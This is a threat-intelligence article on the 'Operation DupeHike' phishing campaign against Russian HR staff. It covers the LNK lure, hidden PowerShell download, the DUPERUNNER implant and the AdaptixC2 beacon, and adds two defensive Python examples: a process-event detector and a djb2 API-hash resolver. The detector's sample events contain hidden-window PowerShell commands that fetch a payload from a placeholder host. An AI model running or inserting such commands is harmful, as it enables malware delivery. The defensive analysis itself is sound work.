A sophisticated attack campaign known as Operation DupeHike has emerged as a significant threat to Russian corporate environments, specifically targeting employees within human resources, payroll, and administrative departments.
The campaign, attributed to the threat group UNG0902, leverages carefully crafted decoy documents themed around employee bonuses and internal financial policies to deliver a previously unknown malware ecosystem to victims’ machines.
The attack begins with spear-phishing emails containing ZIP archives disguised as legitimate corporate documents.
These archives are named “Премия 2025.zip” (Bonus.Zip in English) and contain malicious shortcut files (.LNK) that appear to be PDF documents, using filenames like “Document_1_On_the_size_of_the_annual_bonus.pdf.lnk” to deceive recipients into opening them.
Seqrite security analysts identified this campaign after discovering a malicious ZIP archive on VirusTotal on November 21, 2025.
The research team noted that the threat actor demonstrates sophisticated understanding of Russian corporate HR workflows, crafting decoy documents that outline realistic bonus structures tied to performance metrics, KPIs, and organizational goals.
The lure document references Russia’s Labor Code and establishes a default bonus rate of fifteen percent of annual salary, creating convincing social engineering material for targeting employees in financial departments.
Infection Mechanism and Technical Breakdown
The attack chain operates through three distinct stages, beginning with malicious LNK execution. When a victim opens the shortcut file, it launches PowerShell in the background with the -NoNI (NonInteractive), -nop (NoProfile) and -w hidden (WindowStyle Hidden) switches, so no console window is shown to the user.
The script uses Invoke-WebRequest to download a second-stage implant called DUPERUNNER from the attacker-controlled server at 46.149.71.230.
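The first stage described above (shortcut opened from explorer.exe, PowerShell started with stealth switches, Invoke-WebRequest fetching the next stage) is a pattern that process-creation telemetry can flag. The following Python triage routine is an added example written for this article, not tooling from Seqrite or from the campaign analysis. It runs over constructed process-start records that mimic Sysmon Event ID 1 fields; the command lines, paths and the 192.0.2.10 address are made up for the example and are not indicators from the page.

```python
"""Triage process-creation events for the LNK -> hidden PowerShell -> download pattern."""
import re

# Indicator patterns, matched case-insensitively. PowerShell accepts any unambiguous
# prefix of a parameter name, so "-NoNI" and "-NonInteractive" must both match, as
# must "-w hidden" and "-WindowStyle hidden".
INDICATORS = {
    "hidden_window":   re.compile(r"-w[a-z]*\s+hidden", re.I),
    "non_interactive": re.compile(r"-noni[a-z]*", re.I),
    "no_profile":      re.compile(r"-nop[a-z]*", re.I),
    "web_download":    re.compile(
        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile",
        re.I),
}

POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")

# Constructed sample events (not real telemetry). Fields follow a Sysmon process-creation record.
SAMPLE_EVENTS = [
    {   # stealth switches + download, spawned directly by explorer.exe (double-clicked LNK)
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r'powershell.exe -NoNI -nop -w hidden -c "Invoke-WebRequest -Uri http://192.0.2.10/stage2.bin -OutFile $env:TEMP\stage2.bin"',
    },
    {   # scheduled admin script: one stealth-looking switch, no download primitive
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
    {   # interactive download in a visible console: download primitive, no stealth switch
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r'powershell.exe -Command "Invoke-WebRequest https://example.com/ -OutFile index.html"',
    },
    {   # hidden window + WebClient download, again parented by explorer.exe
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')\"",
    },
]


def analyze_event(event):
    """Return the indicator names present in one event (empty if it is not PowerShell)."""
    if not event["image"].lower().endswith(POWERSHELL_IMAGES):
        return []
    cmd = event["command_line"]
    hits = [name for name, pat in INDICATORS.items() if pat.search(cmd)]
    # A shortcut opened from the desktop or an extracted archive is launched by
    # explorer.exe, so PowerShell with explorer.exe as its direct parent is worth noting.
    if event["parent_image"].lower().endswith("\\explorer.exe"):
        hits.append("parent_explorer")
    return hits


def is_suspicious(hits):
    """Flag only when a download primitive is paired with at least one stealth switch.

    Either half alone is common in legitimate administration; the pairing is what
    characterises the stage-one loader described in the article.
    """
    stealth = {"hidden_window", "non_interactive", "no_profile"}
    return "web_download" in hits and bool(stealth & set(hits))


def triage(events):
    """Return (index, hits) for every event that meets the suspicion rule."""
    results = []
    for i, ev in enumerate(events):
        hits = analyze_event(ev)
        if is_suspicious(hits):
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The rule deliberately requires the download primitive and a stealth switch together: event 1 (a profile-less backup script) and event 2 (a download typed into a visible console) each carry one half and are left alone, while events 0 and 3 trip both. The parent-process field is recorded as supporting context rather than a trigger, since explorer.exe also parents every PowerShell session a user opens by hand.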
DUPERUNNER, a C++ compiled implant, performs critical reconnaissance and injection operations. The malware contains multiple functions designed for maintaining persistence and evading detection.
It enumerates target processes including explorer.exe, notepad.exe, and msedge.exe for injection purposes while simultaneously downloading decoy PDFs to display to users, creating the illusion of legitimate document processing.
The implant then performs remote thread injection to load the final payload: an AdaptixC2 beacon. This command-and-control beacon uses HTTP POST requests to communicate with attacker infrastructure, enabling remote command execution and data exfiltration capabilities.
The beacon employs dynamic API resolution using djb2-style hashing to avoid static detection signatures.
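Because the beacon stores hashes instead of import names, an analyst who recovers a hash from the binary needs a table that maps it back to an export. The following Python is an added example written for this article, not code from the beacon or from Seqrite's analysis. It implements the classic djb2 hash (h = h * 33 + c, seeded with 5381) and its common XOR variant over a constructed list of Windows export names, then resolves a hash back to a name. The export list and the choice of variants are assumptions; the campaign's exact seed, variant and casing rules are not stated on the page, so a real triage would extend the table until the recovered hashes resolve.

```python
"""Build a djb2 lookup table so hashed API references can be mapped back to export names."""

MASK32 = 0xFFFFFFFF


def djb2(name: str, seed: int = 5381) -> int:
    """Classic djb2: h = h * 33 + c over the ASCII bytes, truncated to 32 bits."""
    h = seed
    for c in name.encode("ascii"):
        h = ((h << 5) + h + c) & MASK32
    return h


def djb2_xor(name: str, seed: int = 5381) -> int:
    """djb2 XOR variant: h = (h * 33) ^ c, truncated to 32 bits."""
    h = seed
    for c in name.encode("ascii"):
        h = (((h << 5) + h) ^ c) & MASK32
    return h


# Hash variants to precompute; add seed or casing variants here if recovered hashes do not resolve.
VARIANTS = {
    "djb2_add": djb2,
    "djb2_xor": djb2_xor,
}

# Constructed candidate list: real kernel32/winhttp export names an analyst would try first
# for an implant that injects a remote thread and talks HTTP. Extend from the PE export
# tables of the DLLs actually loaded on the system under analysis.
COMMON_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualAllocEx", "VirtualProtect",
    "OpenProcess", "WriteProcessMemory", "CreateRemoteThread", "CreateThread", "Sleep",
    "ExitProcess", "WinHttpOpen", "WinHttpConnect", "WinHttpOpenRequest",
    "WinHttpSendRequest", "WinHttpReceiveResponse", "WinHttpReadData",
]


def build_hash_table(names, variants=VARIANTS):
    """Map every (variant, name) hash to (name, variant). Collisions are reported, not hidden."""
    table = {}
    for variant, fn in variants.items():
        for name in names:
            h = fn(name)
            if h in table and table[h] != (name, variant):
                raise ValueError(f"hash collision 0x{h:08x}: {table[h]} vs {(name, variant)}")
            table[h] = (name, variant)
    return table


def resolve(hash_value: int, table):
    """Return (export_name, variant) for a recovered hash, or None if it is not in the table."""
    return table.get(hash_value & MASK32)


if __name__ == "__main__":
    table = build_hash_table(COMMON_EXPORTS)
    # Constructed input: pretend these two values were read out of a beacon's hash list.
    for recovered in (djb2("CreateRemoteThread"), djb2_xor("WinHttpSendRequest"), 0):
        print(f"0x{recovered:08x} -> {resolve(recovered, table)}")
```

Resolving the hashes is only the first step; the recovered names tell the analyst which capabilities (process injection, HTTP transport) to expect, and a unit-tested hash routine like this one can be dropped into a disassembler script to annotate the hash constants in place.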
Seqrite researchers extracted configuration artifacts revealing the beacon identification numbers and command-and-control infrastructure hosted on servers under ASN 48282 and ASN 9123, operated by VDSINA-AS and TIMEWEB-AS.
The infrastructure demonstrates port configuration changes from port 80 during implant delivery to port 443 for final beacon operations, indicating ongoing refinement of attack infrastructure.
This campaign represents an evolving threat landscape where sophisticated social engineering combines with advanced malware capabilities to target corporate environments in Eastern Europe.